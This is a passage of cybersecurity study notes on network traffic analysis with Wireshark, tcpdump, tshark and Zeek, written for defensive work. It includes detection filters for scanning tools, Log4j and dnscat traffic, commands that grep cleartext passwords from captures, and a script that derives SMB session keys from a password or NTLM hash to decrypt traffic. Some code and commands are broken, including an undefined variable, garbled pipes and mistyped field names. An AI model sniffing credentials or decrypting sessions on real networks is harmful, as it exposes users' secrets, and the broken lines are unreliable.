Example: List all HTTP packets where packets' "host"
fields match keywords ".php" or ".html".
                          286 / 547
                          HTB CDSA
 http.host matches "\.(php|html)"
[4]
 "in": Search a value or field inside of a
 specific scope/range.
Example:List all TCP packets where packets' "port" fields
have values 80, 443 or 8080.
 tcp.port in {80 443 8080}
[5]
 "upper": Convert a string value to uppercase.
Example:Convert all HTTP packets' "server" fields to
uppercase and list packets that contain the "APACHE"
keyword.
 upper(http.server) contains "APACHE"
[5]
 "lower":Convert a string value to lowercase.
Example: Convert all HTTP packets' "server" fields info to
lowercase and list packets that contain the "apache"
keyword.
                           287 / 547
                            HTB CDSA
 lower(http.server) contains "apache"
[6]
 "string" : Convert a non-string value to a
 string.
Example: Convert all "frame number" fields to string
values, and list frames end with odd values.
 string(frame.number) matches "[13579]$"
And for even numbers use the below
 string(frame.number) matches "[02468]$"
Logical Operators
 and OR   &&
 or OR    ||
 xor OR   ^^
 not OR   !
Practical Scenarios
Decrypting SSL traffic
Wireshark can't decrypt encrypted traffic by default so
we need to specify the decryption parameters if we got
any. Most commonly for [SSL] we will need to provide the
[pre-master key or secret].
If you are already inspecting encrypted traffic look for
                            288 / 547
                           HTB CDSA
[CLIENT_RANDOM] and see if you can find its value. Once
you save it in a [.txt] file and load it as a pre-shared key
as shown below
Extracting RTP Audio Files
RTP communications normally operate over UDP port [1313]
or [51393]. We can create a filter to display packets with
these ports
                            289 / 547
                           HTB CDSA
 udp.port == 1313 or udp.port == 51393
After displaying RTP packets, we can right click on the
packet and select [Decode as RTP]
Then from the menu we follow as below
Select [RTP Streams] will bring up the below menu
Then you can select the stream and select [Analyze] you
will be able to play the Audio.
Decrypting SMB3 Traffic
Encrypted SMB traffic can be spotted with a pattern such
                           290 / 547
                           HTB CDSA
as the one shown below:
In order to decrypt these packets, we will need the
following information:
 -   The username that logged in to the SMB share
 -   Domain name
 -   NTProofStr
 -   Session Key
 -   Random Encrypted Session Key
 -   User’s password or NTLM hash
To extract most of the above information, we will need to
locate the packets that show successful SMB
authentication therefore we can use the filter below:
 smb2.cmd == 0x01
Below is an example showing two users authenticating:
To find other details, we have to drill down on the above
packets and locate the other details mentioned above.
                           291 / 547
                           HTB CDSA
Next step is to use the below python script to find the
Random Encrypted Session Key .
Script below accepts the username, password, session
key and ntproofstring as input arguments:
 import hashlib
 import hmac
 import argparse
 # Stolen from impacket. Thank you all for your
 wonderful contributions to the community
 try:
     from Cryptodome.Cipher import ARC4
     from Cryptodome.Cipher import DES
     from Cryptodome.Hash import MD4
 except Exception:
     print("Warning: You don't have any crypto
 installed. You need pycryptodomex")
     print("See
                           292 / 547
                     HTB CDSA
https://pypi.org/project/pycryptodomex/")
def
generateEncryptedSessionKey(keyExchangeKey,
exportedSessionKey):
    cipher = ARC4.new(keyExchangeKey)
    cipher_encrypt = cipher.encrypt
    sessionKey =
cipher_encrypt(exportedSessionKey)
    return sessionKey
###
parser =
argparse.ArgumentParser(description="Calculate
the Random Session Key based on data from a
PCAP (maybe).")
parser.add_argument("-u", "--user",
required=True, help="User name")
parser.add_argument("-d", "--domain",
required=True, help="Domain name")
parser.add_argument("-p", "--password",
required=True, help="Password of User")
parser.add_argument("-n", "--ntproofstr",
required=True, help="NTProofStr. This can be
found in PCAP (provide Hex Stream)")
parser.add_argument("-k", "--key",
required=True, help="Encrypted Session Key.
                     293 / 547
                       HTB CDSA
This can be found in PCAP (provide Hex
Stream)")
parser.add_argument("-v", "--verbose",
action="store_true", help="increase output
verbosity")
args = parser.parse_args()
# Upper Case User and Domain
user = str(args.user).upper().encode('utf-
16le')
domain = str(args.domain).upper().encode('utf-
16le')
# Create   'NTLM' Hash of password
#passw =   args.password.encode('utf-16le')
#hash1 =   hashlib.new('md4', passw)
password   = hash1.digest()
# Calculate the ResponseNTKey
h = hmac.new(password, digestmod=hashlib.md5)
h.update(user + domain)
respNTKey = h.digest()
# Use NTProofSTR and ResponseNTKey to
calculate Key Exchange Key
NTproofStr = bytes.fromhex(args.ntproofstr)
h = hmac.new(respNTKey, digestmod=hashlib.md5)
h.update(NTproofStr)
                       294 / 547
                          HTB CDSA
 KeyExchKey = h.digest()
 # Calculate the Random Session Key by
 decrypting Encrypted Session Key with Key
 Exchange Key via RC4
 RsessKey =
 generateEncryptedSessionKey(KeyExchKey,
 bytes.fromhex(args.key))
 if args.verbose:
     print("USER WORK: " + user.decode('utf-
 16le') + "" + domain.decode('utf-16le'))
     print("PASS HASH: " + password.hex())
     print("RESP NT: " + respNTKey.hex())
     print("NT PROOF: " + NTproofStr.hex())
     print("KeyExKey: " + KeyExchKey.hex())
 print("Random SK: " + RsessKey.hex())
You can also tweak this script to accept the user NT hash
instead of the password in case you don't have it.
 import hashlib
 import hmac
 import argparse
 # Stolen from impacket. Thank you all for your
 wonderful contributions to the community
 try:
     from Cryptodome.Cipher import ARC4
     from Cryptodome.Cipher import DES
                           295 / 547
                     HTB CDSA
    from Cryptodome.Hash import MD4
except Exception:
    print("Warning: You don't have any crypto
installed. You need pycryptodomex")
    print("See
https://pypi.org/project/pycryptodomex/")
def
generateEncryptedSessionKey(keyExchangeKey,
exportedSessionKey):
    cipher = ARC4.new(keyExchangeKey)
    cipher_encrypt = cipher.encrypt
    sessionKey =
cipher_encrypt(exportedSessionKey)
    return sessionKey
###
parser =
argparse.ArgumentParser(description="Calculate
the Random Session Key based on data from a
PCAP (maybe).")
parser.add_argument("-u", "--user",
required=True, help="User name")
parser.add_argument("-d", "--domain",
required=True, help="Domain name")
parser.add_argument("-n", "--ntproofstr",
required=True, help="NTProofStr. This can be
                     296 / 547
                     HTB CDSA
found in PCAP (provide Hex Stream)")
parser.add_argument("-k", "--key",
required=True, help="Encrypted Session Key.
This can be found in PCAP (provide Hex
Stream)")
parser.add_argument("--ntlmhash",
required=True, help="NTLM hash of the User's
password (provide Hex Stream)")
parser.add_argument("-v", "--verbose",
action="store_true", help="increase output
verbosity")
args = parser.parse_args()
# Upper Case User and Domain
user = str(args.user).upper().encode('utf-
16le')
domain = str(args.domain).upper().encode('utf-
16le')
# Use provided NTLM hash directly
password = bytes.fromhex(args.ntlmhash)
# Calculate the ResponseNTKey
h = hmac.new(password, digestmod=hashlib.md5)
h.update(user + domain)
respNTKey = h.digest()
# Use NTProofSTR and ResponseNTKey to
                     297 / 547
                           HTB CDSA
 calculate Key Exchange Key
 NTproofStr = bytes.fromhex(args.ntproofstr)
 h = hmac.new(respNTKey, digestmod=hashlib.md5)
 h.update(NTproofStr)
 KeyExchKey = h.digest()
 # Calculate the Random Session Key by
 decrypting Encrypted Session Key with Key
 Exchange Key via RC4
 RsessKey =
 generateEncryptedSessionKey(KeyExchKey,
 bytes.fromhex(args.key))
 if args.verbose:
     print("USER WORK: " + user.decode('utf-
 16le') + "" + domain.decode('utf-16le'))
     print("NTLM HASH: " + password.hex())
     print("RESP NT: " + respNTKey.hex())
     print("NT PROOF: " + NTproofStr.hex())
     print("KeyExKey: " + KeyExchKey.hex())
 print("Random SK: " + RsessKey.hex())
Next we run the script:
 python3 script.py -u admin -p 'password' -u
 ntproofstring -k session-key
The output of the above script will be the   Random
Encrypted Session Key      which now can be used to
decrypt the SMB packets.
                           298 / 547
                              HTB CDSA
Head over to   File-->Preferences--->Protocols---
>SMB2   and click on the plus sign to add the values:
Then again head over to   File-->Export Objects-->SMB
and you will extract any file(s) that have been exchanged
during the SMB session.
Detecting TCP connect scans / NMAP scans
We use the below filter
 tcp.flags.syn==1 and tcp.flags.ack==0 and
 tcp.window_size > 1024
tcp.flags.syn == 1 : indicates a TCP SYN flag     set.
tcp.flags.ack : indicates a TCP ACK flag set.
TCP connect scans usually have a windows size larger
than 1024 bytes as the request expects some data due to
the nature of the protocol.
Detecting TCP SYN scans / NMAP scans
                              299 / 547
                           HTB CDSA
 tcp.flags.syn==1 and tcp.flags.ack==0 and
 tcp.window_size <= 1024
TCP Syn scans usually have a size less than or equal to
1024 bytes as the request is not finished and it doesn't
expect to receive data.
Detecting UDP scans / NMAP scans
 icmp.type==3 and icmp.code==3
UDP scans don't require a handshake process and shows
ICMP error message for close ports.
Detecting ARP Poisoning
A regular ARP broadcast request asks if any of the
available hosts use an IP address and there will be a reply
from the host that uses the particular IP address.
For ARP requests
 arp.opcode == 1
For ARP Responses
                           300 / 547
                           HTB CDSA
 arp.opcode == 2
Possible ARP poisoning detection
 arp.duplicate-address-detected or
 arp.duplicate-address-fram
Then you can extract the source mac address and use it in
the below query to identify the malicious ARP requests
sent by the attacker
 eth.src == attacker-mac && arp.opcode == 1
Possible ARP flooding from detection
 ((arp) && (arp.opcode == 1)) &&
 (arp.src.hw_mac == target-mac-address)
A suspicious situation means having two different ARP
responses (conflict) for a particular IP address as shown
below
DHCP Investigation
                           301 / 547
                           HTB CDSA
Usually to list all DHCP packets we can conduct a global
search in Wireshark.
 dhcp
To find DHCP requests which help in identifying hostnames
of the sending hosts as well
 dhcp.option.dhcp == 3
To list the packets that contain the accepted DHCP
responses
 dhcp.option.dhcp == 5
To list packets that contain the denied DHCP requests
 dhcp.option.dhcp == 6
If we are looking to extract hostnames using DHCP
protocol, we can use the below filter to extract the
hostname from the DHCP requests.
 dhcp.option.hostname contains "keyword"
Similarly we can use the DHCP ACK responses to extract
hostnames and domain names
 dhcp.option.domain_name contains "keyword"
                           302 / 547
                           HTB CDSA
Another common option is   requested_ip_address      which
can help us search for which host requested a specific IP
address
 dhcp.option.requested_ip_address == ip
NETBIOS Investigation
NetBIOS or Network Basic Input/Output System is the
technology responsible for allowing applications on
different hosts to communicate with each other.
Global Wireshark search
 nbns
We can also extract hostnames using a NetBIOS query
 nbns.name contains "keyword"
You could use name, TTL or IP.
Opcodes can also be used to search for certain events
such as host name registration
 nbns.flags.opcode == 5
To extract a specific username
 kerberos.CNameString contains "username"
Kerberos Investigation
Kerberos is the default authentication service for
Microsoft Windows domains. It is responsible for
authenticating service requests between two or more
                            303 / 547
                             HTB CDSA
computers over the untrusted network. The ultimate aim
is to prove identity securely.
Global Wireshark search
 kerberos
We can search for user accounts using the below query
 kerberos.CNameString contains "keyword"
Some packets could provide hostname information in this
field. To avoid this confusion, filter the
                                 are hostnames, and the ones
 value. The values end with 
without it are user names.
 kerberos.CNameString and !
 (kerberos.CNameString contains "$" )
We can also filter for domain names
 kerberos.realm contains ".org"
Similarly, we can search for service and domain names for
generated tickets
 kerberos.SNameString == "krbtg"
ICMP Analysis
A large volume of ICMP traffic or anomalous packet sizes
are indicators of ICMP tunnelling.
Global ICMP Wireshark search
                             304 / 547
                            HTB CDSA
 icmp
Searching for packet whose length is more than 64
 data.len > 64 and icmp
DNS Analysis
Global DNS Wireshark search
 dns
Usually malicious DNS queries, that are sent to C2
servers, are longer than default DNS queries and crafted
for subdomain addresses. We can filter by query length
 ns.qry.name.len > 15 and !mdns
We can also search for C2 patterns such as dnscat
 dns contains "dnscat"
FTP Analysis
File Transfer Protocol (FTP) is designed to transfer files
with ease, so it focuses on simplicity rather than
security.
As a result of this, using this protocol in unsecured
environments could create security issues like:
       MITM attacks
       Credential stealing and unauthorised access
       Phishing
                             305 / 547
                              HTB CDSA
       Malware planting
       Data exfiltration
       Global FTP Wireshark search
 ftp
"FTP" search options:
       x1x series: Information request responses.
       x2x series: Connection messages.
       x3x series: Authentication messages
       x1x" series options :
       211: System status.
       212: Directory status.
       213: File status
 ftp.response.code == 211
"x2x" series options:
       220: Service ready.
       227: Entering passive mode.
       228: Long passive mode.
       229: Extended passive mode.
 ftp.response.code == 227
"x3x" series options:
       230: User login.
       231: User logout.
       331: Valid username.
                              306 / 547
                            HTB CDSA
     430: Invalid username or password
     530: No login, invalid password
 ftp.response.code == 230`
"FTP" commands :
     USER: username.
     PASS: Password.
     CWD: Current work directory.
     LIST: List
 ftp.request.command == "USER"
 ftp.request.command == "PASS"
 ftp.request.arg == "password"
Listing failed login attempts
 ftp.response.code == 530
List the target username for brute force
 (ftp.response.code == 530) and
 (ftp.response.arg contains "username")
Detect password spray and list targets
 (ftp.request.command == "PASS" ) and
 (ftp.request.arg == "password")
                            307 / 547
                            HTB CDSA
HTTP Analysis
Global HTTP Wireshark search
 http
 http2
Searching by request method
 http.request.method == "GET"
 http.request.method == "POST"
 http.request
HTTP response codes
     200 OK: Request successful.
     301 Moved Permanently: Resource is moved to a new
     URL/path (permanently).
     302 Moved Temporarily: Resource is moved to a new
     URL/path (temporarily).
     400 Bad Request: Server didn't understand the
     request.
     401 Unauthorised: URL needs authorisation (login,
     etc.).
     403 Forbidden: No access to the requested URL.
     404 Not Found: Server can't find the requested URL.
     405 Method Not Allowed: Used method is not suitable
     or blocked.
     408 Request Timeout:     Request look longer than
     server wait time.
     500 Internal Server Error: Request not completed,
     unexpected error.
                            308 / 547
                           HTB CDSA
      503 Service Unavailable: Request not completed
      server or service is down.
 http.response.code == 200
 http.response.code == 401
 http.response.code == 503
Searching by user agent
[1]
 http.user_agent contains "nmap"
[2]
 (http.user_agent      contains        "sqlmap") or
 (http.user_agent      contains        "Nmap") or
 (http.user_agent      contains        "Wfuzz") or
 (http.user_agent      contains        "Nikto")
Searching in the URL
[1]
 http.request.uri contains "admin"
[2]
 http.request.full_uri contains "admin"
Searching for the web server software
                           309 / 547
                           HTB CDSA
 http.server contains "apache"
Searching for the hostname of the web server
 http.host contains "keyword"
Detecting Log4j Vulnerability
The attack starts with a "POST" request
 http.request.method == "POST"
There are known cleartext patterns: "jndi:ldap" and
"Exploit.class".
[1]
 (ip contains "jndi") or ( ip contains
 "Exploit")
[2]
 (frame contains "jndi") or ( frame contains
 "Exploit")
[3]
 (http.user_agent contains "$") or
 (http.user_agent contains "==")
https analysis
In Wireshark, HTTPS packets will appear in different
colours as the HTTP traffic is encrypted. Also, protocol
                           310 / 547
                            HTB CDSA
and info details (actual URL address and data returned
from the server) will not be fully visible.
HTTPS search parameters:
     Request: Listing all requests
     TLS: Global TLS search
     TLS Client Request
     TLS Server response
     Local Simple Service Discovery Protocol (SSDP). SSDP
     is a network protocol that provides advertisement
     and discovery of network services.
     Example is below
 tls.handshake.type == 1
Similar to the TCP three-way handshake process, the TLS
protocol has its handshake process. The first two steps
contain "Client Hello" and "Server Hello" messages. The
given filters show the initial hello packets in a capture
file. These filters are helpful to spot which IP addresses
are involved in the TLS handshake.
Client Hello
 (http.request or tls.handshake.type == 1) and
 !(ssdp)
Server Hello
 (http.request or tls.handshake.type == 2) and
 !(ssdp)
                            311 / 547
                            HTB CDSA
Extracting Clear-Text Credentials
Some Wireshark dissectors (FTP, HTTP, IMAP, pop and
SMTP) are programmed to extract cleartext passwords
from the capture file. You can view detected credentials
using the "Tools --> Credentials" menu. This feature
works only after specific versions of Wireshark (v3.1 and
later). Since the feature works only with particular
protocols, it is suggested to have manual checks and not
entirely rely on this feature to decide if there is a
cleartext credential in the traffic.
Once you use the feature, it will open a new window and
provide detected credentials. It will show the packet
number, protocol, username and additional information.
This window is clickable; clicking on the packet number
will select the packet containing the password, and
clicking on the username will select the packet containing
the username info. The additional part prompts the packet
number that contains the username.
Creating Firewall Rules From Wireshark
You can create firewall rules by using the "Tools --
> Firewall ACL Rules" menu. Once you use this feature, it
will open a new window and provide a combination of rules
(IP, port and MAC address-based) for different purposes.
Note that these rules are generated for implementation on
                             312 / 547
                               HTB CDSA
an outside firewall interface.
Currently, Wireshark can create rules for:
     Netfilter (iptables)
     Cisco IOS (standard/extended)
     IP Filter (ipfilter)
     IPFirewall (ipfw)
     Packet filter (pf)
     Windows Firewall (netsh new/old format)
TCPDUMP
Capturing traffic on any interface from a target   ip   and
send the output to a    file
 # tcpdump -w file.pcap -i any dst ip
Same as above but only captures traffic on port 80
 # tcpdump -w file.pcap -i any dst ip and port
 80
View traffic in hex or ascii
                               313 / 547
                           HTB CDSA
 tcpdump -A
 tcpdump -X
Enable verbosity, disable name resolution and view traffic
with timestamp
 # tcpdump -tttt -n -vv
Displaying top 1000 packets
 # tcpdump -nn -c 1000 | awk '{print $3}' I cut
 -d. -
 fl-4 I sort -n I uniq -c I sort -nr
Viewing traffic between two IPs
 # tcpdump host ip1 && host ip2
Exclude traffic from a specific host ip
 # tcpdump not host ip
Exclude traffic from a specific subnet
 # tcpdump not net ip/cidr
Save the output to a remote SSH server
 # tcpdump -w - | ssh ip -p port
 "cat -> /tmp/remotecapture.pcap"
                              314 / 547
                             HTB CDSA
Display the traffic with a specific word
 # tcpdump -n -A -s0 | grep pass
Searching for passwords in clear-text non-encrypted
protocols
 # tcpdump -n -A -s0 port http or port ftp or
 port smtp or port imap or port pop3 | egrep -i
 'pass=|pwd=|log=|login=|user=|username=|pw=|pa
 ssw=|Passwd=|password=|pass: |user: |username:
 |password: |login: |pass |user ' --color=auto
 --line-buffered -B20
Filtering ipv6 or ipv4 traffic
 # tcpdump ip6
 # tcpdump ip4
Tshark
Definition
TShark is an open-source command-line network traffic
analyser. It is created by the Wireshark developers and
has most of the features of Wireshark. It is commonly
used as a command-line version of Wireshark. However, it
can also be used like tcpdump. Therefore it is preferred
for comprehensive packet assessments.
Sniffing Traffic / Live Capture
                                 315 / 547
                            HTB CDSA
Sniffing can be done with and without selecting a specific
interface. When a particular interface is selected, TShark
uses that interface to sniff the traffic. TShark will use
the first available interface when no interface is selected,
usually listed as 1 in the terminal. Having no interface
argument is an alias for   -i 1 .        You can also set different
sniffing interfaces by using the parameter         -i .   TShark
always echoes the used interface name at the beginning of
the sniffing.
 tshark
List available sniffing interfaces
 tshark -D
Listen for traffic on a single or multiple interfaces
 tshark -i ethl -i eth2 -i eth3
 tshark -i eth0
Save captured traffic to a pcap file without name
resolution
 tshark -nn -w output.pcap
Stop after capturing a specified number of packets.
 tshark -c 10
                             316 / 547
                            HTB CDSA
Using silent mode to suspress the packet outputs on the
terminal
 tshark -q
TShark can show packet details in hex and ASCII format.
You can view the dump of the packets by using the       -
x   parameter. Once you use this parameter, all packets
will be shown in hex and ASCII format. Therefore, it might
be hard to spot anomalies at a glance, so using this
option after reducing the number of packets will be much
more efficient.
 tshark -r file.pcap -x
Default TShark packet processing and sniffing operations
provide a single line of information and exclude verbosity.
The default approach makes it easy to follow the number
of processed/sniffed packets; however, TShark can also
provide verbosity for each packet when instructed.
Verbosity is provided similarly to Wireshark's "Packet
Details Pane". As verbosity offers a long list of packet
details, it is suggested to use that option for specific
packets instead of a series of packets
 tshark -r demo.pcapng -c 1 -V
Capture Filters
The purpose of capture filters is to save only a specific
part of the traffic. It is set before capturing traffic and is
not changeable during live capture. Usually to use capture
                             317 / 547
                            HTB CDSA
filters, we specify the options         -f   in the command line
followed by the type of operator (ip,net,host,etc).
Filter a specific host
 tshark -f "host 10.10.10.10"
Filtering a network range
 tshark -f "net 10.10.10.0/24"
Filtering a Port
 tshark -f "port 80"
Filtering a port range
 tshark -f "portrange 80-100"
Filtering source address
 tshark -f "src host 10.10.10.10"
Filtering destination address
 tshark -f "dst host 10.10.10.10"
Filtering TCP
 tshark -f "tcp"
Filtering MAC address
                            318 / 547
                            HTB CDSA
 tshark -f "ether host F8:DB:C5:A2:5D:81"
Listen for traffic on a specific protocol
 tshark protocol
Display traffic on either ARP or ICMP protocols
 tshark arp or icmp
Capture traffic between two hosts
 tshark "host <HOST l> && host <HOST 2>"
Capture traffic between two subnets
 tshark -n "net subnet1 && net subnet2"
Filter out an IP from the displayed traffic
 tshark not host ip
Specifying a port
 tshark udp.port == 53
Display only source and destination IPs separated by a
comma
 tshark -n -e ip.src -e ip.dst -T fields -E
                            319 / 547
                           HTB CDSA
 separator=, -R ip
Grab DNS queries from a source IP. Useful for hunting for
malicious traffic to C2
 tshark -n -e ip.src -e dns.qry.name -E
 separator=';' -T fields port 53
Grab HTTP requested URLs and hosts
 tshark -R http.request -T fields -E
 separator=';' -e http.host -e http.request.uri
Grab requested URLs that contain       .exe
 tshark -n -e http.request.uri -R http.request
 -T fields | grep exe
Top 100 Destination IPs
 tshark -n -c 100 | awk '{print $4}' | sort -n
 |
 uniq -c | sort -nr
Top Stats based on protocol
 tshark -q -z io,phs -r file.pcap
Top 1000 http requests
                           320 / 547
                           HTB CDSA
 tshark -n -c 1000 -e http.host -R http.request
 -T fields port 80 | sort | uniq -c | sort -r
Grab server names for SSL certificates in a given pcap file
 # tshark -nr file.pcap -Y
 "ssl. handshake. ciphersuites" -Vx | grep
 "ServerName:" | sort | uniq -c | sort -r
Run Tshark for 10 seconds and stop
 tshark -w test.pcap -a duration:10
Run Tshark and stop when the output file reaches 500 KB
 tshark -w test.pcap -a filesize:500
Run Tshark until the output file size reaches 500 KB and
then create a new output file and continue capturing.
 tshark -w test.pcap -b filesize:500
Run Tshark for 10 seconds then create a new output file
and continue capturing.
 tshark -w test.pcap -a duration:10
PCAP Analysis
Read a capture file
                           321 / 547
                             HTB CDSA
 tshark -r demo.pcapng
Display traffic from a specific IP
 tshark -r file.pcap -q -z ipv4
Top http stats
 tshark -r file.pcap -R http.request -T
 fields -e http.host -e http.request.uri | sed
 -e 's/?.*$//' | sed -e
 's#^(.*)t(.*)$#http://12#' | sort | uniq -c |
 sort -rn | head
Replay a pcap file and display hosts
 tshark -r file.pcap -q -z hosts
Display Filters
The purpose of display filters is to investigate packets
after finishing live traffic. We usually do it with the
options   -Y   followed by the operator. Below are some
examples;
Filtering an IP without specifying a direction
 tshark -Y 'ip.addr == 10.10.10.10'
Filtering a network range
 tshark -Y 'ip.addr == 10.10.10.0/24'
                             322 / 547
                             HTB CDSA
Filtering a source IP
 tshark -Y 'ip.src == 10.10.10.10'
Filtering a destination IP
 tshark -Y 'ip.dst == 10.10.10.10'
Filtering TCP port
 tshark -Y 'tcp.port == 80'
Filtering source TCP port
 tshark -Y 'tcp.srcport == 80'
Filtering HTTP packets
 tshark -Y 'http'
Filtering HTTP packets with response code "200"
 tshark -Y "http.response.code == 200"
Filtering DNS packets
 tshark -Y 'dns'
Filtering all DNS packets with record    A
 tshark -Y 'dns.qry.type == 1'
                             323 / 547
                            HTB CDSA
You can use the   nl   command to get a numbered list of
your output. Therefore you can easily calculate the "total
number of filtered packets" without being confused with
assigned packet numbers .           The usage of the   nl
command is shown below.
 tshark -r file.pcapng -Y 'http' | nl
Analytics
Protocol hierarchy & Stats
Protocol hierarchy helps analysts to see the protocols
used, frame numbers, and size of packets in a tree view
based on packet numbers. As it provides a summary of
the capture, it can help analysts decide the focus point
for an event of interest. Use the       -z io,phs -
q   parameters to view the protocol hierarchy
 tshark -r pcap.pcapng -z io,phs -q
After viewing the entire packet tree, you can focus on a
specific protocol as shown below. Add the       udp    keyword
to the filter to focus on the UDP protocol.
 tshark -r pcap.pcapng -z io,phs,udp -q
Packet Length
The packet lengths tree view helps analysts to overview
the general distribution of packets by size in a tree view.
It allows analysts to detect anomalously big and small
                            324 / 547
                           HTB CDSA
packets at a glance! Use the       -z plen,tree -
q   parameters to view the packet lengths tree.
 tshark -r demo.pcapng -z plen,tree -q
Endpoints
The endpoint statistics view helps analysts to overview
the unique endpoints. It also shows the number of packets
associated with each endpoint. Similar to Wireshark,
TShark supports multiple source filtering options for
endpoint identification. Use the        -z endpoints,ip -
q   parameters to view IP endpoints.
 tshark -r pcap.pcapng -z endpoints,ip -q
Conversations
The conversations view helps analysts to overview the
traffic flow between two particular connection points.
Similar to endpoint filtering, conversations can be viewed
in multiple formats. This filter uses the same parameters
as the "Endpoints" option. Use the         -z conv,ip -
q   parameters to view IP conversations.
 tshark -r demo.pcapng -z conv,ip -q
IPv4 and IPv6
This option provides statistics on IPv4 and IPv6 packets,
as shown below. Having the protocol statistics helps
analysts to overview packet distribution according to the
protocol type. You can filter the available protocol types
                            325 / 547
                           HTB CDSA
and view the details using the          -z ptype,tree -
q     parameters.
 tshark -r demo.pcapng -z ptype,tree -q
Having the summary of the hosts in a single view is useful
as well. Especially when you are working with large
captures, viewing all hosts with a single command can
help you to detect an anomalous host at a glance. You can
filter all IP addresses using the parameters given below.
 #ipv4
 tshark -r demo.pcapng -z ip_hosts,tree -q
 #ipv6
 tshark -r demo.pcapng -z ipv6_hosts,tree -q
We can also narrow down the focus based on the direction
flow be it source or destination IPs
 #ipv4
 tshark -r demo.pcapng -z ip_srcdst,tree -q
 #ipv6
 tshark -r demo.pcapng -z ipv6_srcdst,tree -q
DNS
Stats on DNS Packets
 tshark -r demo.pcapng -z dns,tree -q
HTTP
Stats on HTTP Packets
                            326 / 547
                           HTB CDSA
 tshark -r demo.pcapng -z http,tree -q
You can filter the packets and view the details using the
parameters given below.
     Packet and status counter for HTTP:       -z
      http,tree -q
     Packet and status counter for HTTP2:          -z
      http2,tree -q
     Load distribution:-z http_srv,tree -q
     Requests: -z http_req,tree -q
     Requests and responses: -z http_seq,tree -q
Following Streams
Similar to Wireshark, you can filter the packets and follow
the streams by using the parameters given below. Note
that streams start from "0".
     TCP Streams: -z follow,tcp,ascii,0 -q
     UDP Streams: -z follow,udp,ascii,0 -q
     HTTP Streams: -z follow,http,ascii,0 -q
Following the second tcp stream:
 tshark -r demo.pcapng -z follow,tcp,ascii,1 -q
Exporting Objects
This option helps analysts to extract files from
DICOM, HTTP, IMF, SMB and TFTP using the option         --
export-objects     followed by the protocol.
                            327 / 547
                            HTB CDSA
Below command extracts     http         objects and saves it to
objects
 tshark -r pcap.pcapng --export-objects
 http,/home/kali/Desktop/objects -q
Extracting Clear Text Credentials
This option helps analysts to detect and collect cleartext
credentials from FTP, HTTP, IMAP, POP and SMTP. Use               -z
credentials
 tshark -r pcap.pcap -z credentials -q
Fields Extraction
This option helps analysts to extract specific parts of data
from the packets. In this way, analysts have the
opportunity to collect and correlate various fields from the
packets.
You can use the option    -T fields         followed by   -e
[field-name    to extract data from a specific field and
you follow it by   -E header=y          to view the packet
headers.
Below command extracts source and destination IPs from
the first five packets.
 tshark -r data.pcapng -T fields -e ip.src -e
 ip.dst -E header=y -c 5
Conditional Data Extraction
                            328 / 547
                            HTB CDSA
Using Contains
We can use the operator by using the option     -Y      that's
used for display filters. Example below search all http
packers where the server field contains      Apache
 tshark -r file.pcapng -Y 'http.server contains
 "Apache"'
Using Matches
Same with   contains ,   we can use this operator to look
for exact matches of a keyword.
Below we extract packets where the field
http.request.method       equals to either   Get   or    POST
 tshark -r file.pcapng -Y 'http.request.method
 matches "(GET|POST)"'
Zeek
Definition
Zeek is a passive, open-source network traffic analyser.
Many operators use Zeek as a network security monitor
(NSM) to support suspicious or malicious activity
investigations. Zeek also supports a wide range of traffic
analysis tasks beyond the security domain, including
performance measurement and troubleshooting.
Zeek Architecture
                            329 / 547
                           HTB CDSA
Zeek has two primary layers; "Event Engine" and "Policy
Script Interpreter". The Event Engine layer is where the
packets are processed; it is called the event core and is
responsible for describing the event without focusing on
event details. It is where the packages are divided into
parts such as source and destination addresses, protocol
identification, session analysis and file extraction. The
Policy Script Interpreter layer is where the semantic
analysis is conducted. It is responsible for describing the
event correlations by using Zeek scripts.
Zeek Frameworks
Zeek has several frameworks to provide extended
functionality in the scripting layer. These frameworks
enhance Zeek's flexibility and compatibility with other
network components.
Running Zeek as a service
Run Zeek as a service to be able to perform live network
packet capture or to listen to the live network traffic.
To run Zeek as a service we will need to start the
"ZeekControl" module which requires superuser
permissions to use. You can elevate the session privileges
and switch to the superuser account to examine the
generated log files with the following command:    sudo su
 root@ubuntu$ zeekctl
Primary management of the Zeek service is done with
three commands; "status", "start", and "stop".
                            330 / 547
                            HTB CDSA
      zeekctl status
      zeekctl start
      zeekctl stop
Running Zeek as a Packet Investigator
Once you process a pcap file, Zeek automatically creates
log files according to the traffic.
In pcap processing mode, logs are saved in the working
directory. You can view the generated logs using the     ls
-l   command.
 zeek -C -r sample.pcap
-r : Reading option, read/process       a pcap file.
-C : Ignoring checksum errors.
-v : Version information.
zeekctl :ZeekControl module.
Logging
Zeek provides 50+ log files under seven different
categories, which are helpful in various areas such as
traffic monitoring, intrusion detection, threat hunting and
web analytics.
Once you process a pcap with Zeek, it will create the logs
in the working directory. If you run the Zeek as a
service, your logs will be located in the default log
path. The default log path is:     /opt/zeek/logs/
Correlation between different log files generated by Zeek
is done through a unique value called "UID". The "UID"
                            331 / 547
                            HTB CDSA
represents the unique identifier assigned to each session.
Investigating the generated logs will require command-line
tools (cat, cut, grep sort, and uniq) and additional tools
(zeek-cut).
In addition to Linux command-line tools, one auxiliary
program called   zeek-cut    reduces the effort of
extracting specific columns from log files. Each log file
provides "field names" in the beginning. This information
will help you while using   zeek-cut .   Make sure that you
use the "fields" and not the "types".
Example of using zeek-cut to process a log file is shown
below:
 cat conn.log | zeek-cut uid proto id.orig_h
 id.orig_p id.resp_h id.resp_
Tables below describe log types in nutshell
[1]
                             332 / 547
                              HTB CDSA
[2]
      Overall Info :      The aim is to review the overall
      connections, shared files, loaded scripts and
      indicators at once. This is the first step of the
      investigation.
      Protocol Based :       Once you review the overall
      traffic and find suspicious indicators or want to
      conduct a more in-depth investigation, you focus on
      a specific protocol.
      Detection :      Use the prebuild or custom scripts and
      signature outcomes to support your findings by
      having additional indicators or linked actions.
      Observation :      The summary of the hosts,
      services, software, and unexpected activity
      statistics will help you discover possible missing
      points and conclude the investigation.
Zeek Signatures
                              333 / 547
                           HTB CDSA
Zeek supports signatures to have rules and event
correlations to find noteworthy activities on the network.
Zeek signatures use low-level pattern matching and cover
conditions similar to Snort rules. Unlike Snort rules, Zeek
rules are not the primary event detection point. Zeek has
a scripting language and can chain multiple events to find
an event of interest.
Zeek signatures are composed of three logical paths:
      Signature id : Unique signature name.
      Conditions : Header: Filtering the packet    headers
     for specific source and destination addresses,
     protocol and port numbers. Content: Filtering the
     packet payload for specific value/pattern.
      Action :   Default action: Create the
     "signatures.log" file in case of a signature match.
     Additional action: Trigger a Zeek script.
The below table provides the most common conditions and
filters for the Zeek signatures.
                            334 / 547
                           HTB CDSA
